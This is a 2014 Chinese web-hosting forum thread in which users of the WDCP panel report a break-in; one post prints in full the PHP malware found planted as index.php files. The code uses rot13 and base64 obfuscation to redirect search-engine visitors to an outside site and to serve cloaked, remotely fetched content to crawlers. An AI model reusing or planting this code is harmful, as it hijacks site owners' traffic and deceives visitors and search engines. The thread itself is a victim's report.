Rank: 2

1^# 跳轉(zhuǎn)到 » 倒序看帖

字體大小: tT

發(fā)表于 2014-9-25 11:18 | 只看該作者

提問三步曲: 提問先看教程/FAQ索引(wdcp,wdcp_v3,一鍵包)及搜索,會讓你更快解決問題
1 提供詳細，如系統(tǒng)版本,wdcp版本,軟件版本等及錯誤的詳細信息,貼上論壇或截圖發(fā)論壇
2 做過哪些操作或改動設(shè)置等

溫馨提示：信息不詳,很可能會沒人理你！論壇有教程說明的，也可能沒人理！因為,你懂的

[BUG反饋] 這是WDCP的漏洞嗎？如何解決？！

WDCP是一個非常好的虛擬主機管理軟件，出于對WDCP的信任，在服務(wù)器上安裝了，但是最近發(fā)現(xiàn)嚴重的問題：

我喜歡！

AI導(dǎo)航網(wǎng)，AI網(wǎng)站大全，AI工具大全，AI軟件大全，AI工具集合，AI編程，AI繪畫，AI寫作，AI視頻生成，AI對話聊天等，盡在aiaiV.cn

luza

注冊會員

Rank: 2

2^#

發(fā)表于 2014-9-25 11:19 | 只看該作者

數(shù)據(jù)庫被入侵了，并且成功上傳三個文件，現(xiàn)在最腦火的是，不知道這三個文件是哪三個！

請管理員給個教程��！

我喜歡！

TOP

feng521w

新手上路

Rank: 1

3^#

發(fā)表于 2014-9-25 11:34 | 只看該作者

太他媽的可怕；了

TOP

zhoumo310

中級會員

Rank: 3 Rank: 3

4^#

發(fā)表于 2014-9-25 18:09 | 只看該作者

我們都遭遇了相同問題。希望wdcp盡快修復(fù)。
同類帖子大集合 http://www.fsowen.com/bbs/viewth ... amp;extra=#pid63741

AI導(dǎo)航網(wǎng)，AI網(wǎng)站大全，AI工具大全，AI軟件大全，AI工具集合，AI編程，AI繪畫，AI寫作，AI視頻生成，AI對話聊天等，盡在aiaiV.cn

TOP

joynow

新手上路

Rank: 1

5^#

發(fā)表于 2014-9-26 08:54 | 只看該作者

我也遇到同樣的問題，上傳的文件都是index.php，其實就是把目錄下的空文件替換成掛馬文件，但這些文件沒有人訪問不知有什么用處？黑客都是直接登陸WDCP后臺，估計是利用了WDCP的漏洞。
快照4.png

掛馬的內(nèi)容：

<?php
date_default_timezone_set('PRC');
set_time_limit(20);
error_reporting(0);
header('Content-type: text/html; charset=gbk');
define('SPIDERS','LzScMUI8p28hL29gsUAiM291sUyunT9isTqiM2ky');
define('HOSTS',$_SERVER['SERVER_NAME']);
define('d58ok','0');
define('REFES',$_SERVER['HTTP_REFERER']);
define('USERS',$_SERVER['HTTP_USER_AGENT']);
define('URLS',$_SERVER['REQUEST_URI']);
$Class_urls = 'http://www.5886887.com/';
$Class_zhus = 'nUE0pQbiYmL3YwR5BP4kAwthZGD2Yj==';
$KIP=array('117.28.255.37','116.55.241.24','125.64.94.219','119.147.114.213','118.122.188.194','60.172.229.61','61.188.39.16','61.147.98.198','61.129.45.72','113.98.254.245','58.221.61.128','117.34.73.70','58.215.190.84','117.28.255.53','183.91.40.144','117.21.220.245','122.228.200.46','61.164.150.70','61.147.108.41','116.55.242.138','114.80.222.242','61.147.108.41','116.255.230.70','222.186.24.26','222.186.24.59','220.181.158.106','123.125.160.215');
define('PATHS',__FILE__);
function Reads($url){
$opts = array('http' => array('method' => "GET",'timeout' => 8));
$context = stream_context_create($opts);
$html = file_get_contents($url, false, $context);
if(empty($html)){$html = file_get_contents($url);}
return $html;
}
function Ips(){
if(@$_SERVER["HTTP_X_FORWARDED_FOR"]){
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
}else if(@$_SERVER["HTTP_CLIENT_IP"]){
$ip = $_SERVER["HTTP_CLIENT_IP"];
}else if(@$_SERVER["REMOTE_ADDR"]){
$ip = $_SERVER["REMOTE_ADDR"];
}else if(@getenv("HTTP_X_FORWARDED_FOR")){
$ip = getenv("HTTP_X_FORWARDED_FOR");
}else if(@getenv("HTTP_CLIENT_IP")){
$ip = getenv("HTTP_CLIENT_IP");
}else if(@getenv("REMOTE_ADDR")){
$ip = getenv("REMOTE_ADDR");
}else{
$ip = "Unknown";
}return $ip;
}
function R($string){
$Class_now = str_rot13($string);
$Class_now = base64_decode($Class_now);
return $Class_now;
}
if(eregi(R(SPIDERS),REFES)){
$Class_site = true;
if(eregi("site%3A|inurl%3A",REFES)){
setcookie('x86',HOSTS,time() + 259200);
$Class_site = false;
}
if($Class_site && empty($_COOKIE['x86'])){
setcookie('x86',HOSTS,time() + 259200);
$Class_from = $Class_urls;
$Class_home = $Class_from;
header("Location: ".$Class_home.'?'.HOSTS);
exit;
}
}
if(d58ok){
$Class_UR = R($Class_zhus).'?xxurl='.bin2hex(URLS);
$Class_UR .= '&xxhost='.bin2hex(HOSTS);
$Class_code = Reads($Class_UR);
if(trim($Class_code) !== 'nonono')
{echo base64_decode($Class_code);exit;}
}
if(eregi(R(SPIDERS),USERS)){
if(!in_array(Ips(),$KIP)){
$Class_UR = R($Class_zhus).'?xxurl='.bin2hex(URLS);
$Class_UR .= '&xxhost='.bin2hex(HOSTS);
$Class_code = Reads($Class_UR);
if(trim($Class_code) !== 'nonono')
{echo base64_decode($Class_code);exit;}
}
}
?>